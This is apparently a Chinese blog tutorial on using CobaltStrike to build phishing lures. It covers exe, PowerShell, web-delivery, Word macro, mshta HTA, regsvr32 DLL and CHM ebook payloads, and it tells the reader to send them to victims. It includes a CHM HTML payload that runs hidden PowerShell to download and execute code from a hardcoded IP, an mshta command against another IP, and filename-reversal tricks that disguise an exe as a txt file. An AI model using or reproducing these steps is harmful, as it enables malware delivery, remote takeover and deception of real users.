当前位置: 首页 > news >正文

如何网络“钓鱼”,钓鱼鱼饵生成工具CobaltStrike使用

CobaltStrike工具

如何下载及配置,在上一篇文章

用途:

           

还有插件可以使用

1. exe

有效载荷----Windows可执行程序

先点击三个点,选择刚刚添加的监听器,输出模式使用Windows exe     生成

将文件选择好保存的路径,打开刚刚生成的.exe文件,就可以看到程序中多出一个进程

利用方法:将生成的.exe文件发送给要钓鱼的用户,引导他点击exe文件

2.Powershell

 有效载荷--->Payload生成器--->选择监听器--->选择Powershell Command--->生成txt文件

生成内容为编码,只需复制内容,将其放入cmd执行就可以,cmd执行完会立即关闭,是正常的

收到的第二个

用法:利用漏洞,能够获取到命令执行权限的

3.Web投递

攻击--->Web投递--->进行配置--->⽣成

生成一份命令,放到cmd执行就能收到

用法:利用漏洞,能够获取到命令执行权限的

4.Word宏文档

需要用到office,利用条件苛刻,使用较少,需开启宏权限

有效载荷--->office宏--->选择监听器--->复制

直接复制         

新建一个docx文档,使用office打开

点击视图-->宏-->查看宏

名字任意

将我们复制的宏代码放进去

点 是

然后重新使用office打开docx文件就可以收到

5.mshta上线

有效载荷--->HTA文档--->⽣成

将文件保存,站点管理--->文件托管--->选择刚才生成的文件       运行

复制地址

cmd输入         mshta http://39.105.47.83:80/download/file.ext

用法:利用漏洞,能够获取到命令执行权限的

6.DLL文件

生成dll文件

cmd执行         regsvr32 beacon_x64.dll         进行注册

就可以收到

用法:利用漏洞,能够上传文件,获取到命令执行权限的

​6.chm电子书钓鱼

1.这里制作 CHM 需要用到一个工具就是 EasyCHM
下载地址:https://www.zipghost.com/download/easychm/echmsetup.exe
2.打开 cs,生成 payload 攻击-web 投递

写一个html文件,内容为方框中,将生成的代码替换句中,复制替换完成后,在powershell.exe 后面加一个逗号

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://8.141.0.63:80/ccc'))">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

 放到一个文件夹中

编译    生成
双击生成的chm文件
就可以成功监听

文件名伪装

改变文本读取顺序

写入的文件名也是倒着写

虽然是看起来是txt后缀,但实际是exe后缀

http://www.dtcms.com/a/325487.html

相关文章:

  • LangVM —— 一站式多语言版本管理工具,让 Java、Python、Go、Node.js 切换更丝滑
  • 运维学习Day21——LAMP/LNMP 最佳实践
  • Django Request 与 DRF Request 的区别
  • 从 GPT-2 到 gpt-oss:架构进步分析
  • 企业级 IT 运维服务平台数据备份方案:基于 rsync 的自动化实现
  • 时钟频率与带宽
  • 低延迟RTSP|RTMP视频链路在AI驱动无人机与机器人操控中的架构实践与性能优化
  • FlinkSql(详细讲解二)
  • 深入解析游戏引擎(OGRE引擎)通用属性系统:基于Any类的类型安全动态属性设计
  • 服务器配置实战:从 “密码锁” 到 “分工协作” 的知识点详解
  • 【linux】企业级WEB应用服务器tomcat
  • Uipath Studio中的文件管理
  • 基于Springboot+UniApp+Ai实现模拟面试小工具九:移动端框架搭建
  • 4种无需WiFi将数据从iPhone传输到iPhone的方法
  • GraphRAG:用知识图谱赋能检索增强生成,攻克复杂推理难题
  • 【MySQL基础篇】:MySQL索引——提升数据库查询性能的关键
  • 力扣109:有序链表转换二叉搜索树
  • 深入浅出设计模式——行为型模式之观察者模式 Observer
  • vlan (hybird) 实验
  • Python bisect 库详细介绍
  • 【Java基础】你认为Java的优势是什么
  • 【C语言入门级教】函数指针变量
  • 当 WAF 遇上黑客——一次混合式攻击的应急复盘
  • GO学习记录三
  • 5G 非地面网络(NTN)最专业的方案
  • Docker 详解(保姆级安装+配置+使用教程)
  • 【MySQL✨】服务器安装 MySQL 及配置相关操作
  • 零 shot 语义+在线闭环:深度学习让机器人学会“主动”
  • JavaWeb-后端Web实战(IOC + DI)
  • 第八篇:交互入门:鼠标拾取物体